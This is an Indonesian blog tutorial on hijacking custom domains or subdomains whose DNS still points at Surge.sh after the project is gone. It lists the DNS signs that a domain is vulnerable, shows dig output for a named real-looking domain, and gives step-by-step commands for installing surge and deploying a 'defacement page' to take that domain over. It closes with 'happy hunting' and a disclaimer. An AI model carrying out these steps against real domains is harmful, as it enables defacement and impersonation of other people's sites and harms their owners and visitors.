Surge.sh Custom Domain or Subdomain Takeover
Surge.sh Custom Domain or Subdomain Takeover – Sejauh ini melakukan takeover domain di Surge adalah yang paling mudah. Bukan bermaksud meremehkan, namun proses yang harus dilalui sangat simpel.
Yang harus Diperiapkan
- OS Linux – bebas mau di lokal atau di vps.
- Nodejs – install nodejs
Vuln
Berikut ciri-ciri situs yang bisa ditakeover
Error:
project not found
Dan syarat domain bisa ditakeover adalah :
- CNAME mengarah ke na-west1.surge.sh
atau
- A Record mengarah ke 45.55.110.124
Kalau salahsatu syaratnya terpenuhi, maka bisa kita takeover. Contoh:
dig agilesysadmin.com
; <<>> DiG 9.10.3-P4-Ubuntu <<>> agilesysadmin.com
;; global options: +cmd
.......
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;agilesysadmin.com. IN A
;; ANSWER SECTION:
agilesysadmin.com. 3599 IN A 45.55.110.124
...........
How to Takeover
Pastikan kalian sudah install Nodejs. Sekarang install Surge via npm.
sudo npm install --global surge
Sekarang kita buat direktori untuk file Surge. Karena kita hanya akan men-takeover domain jadi cukup upload saja index.html dengan script defacement page.
mkdir surge
cd surge
nano index.html
Sekarang kita run surge dengan perintah
surge path_project namadomain.
Contoh
surge /home/linuxsec/surge/ agilesysadmin.com
Contoh jika berhasil.
Lalu sekarang coba cek domain yang berhasil kita takeover.
Oke sekian tutorial kali ini. Happy hunting.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Surge.sh Custom Domain or Subdomain Takeover.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Surge.sh Custom Domain or Subdomain Takeover"
Posting Komentar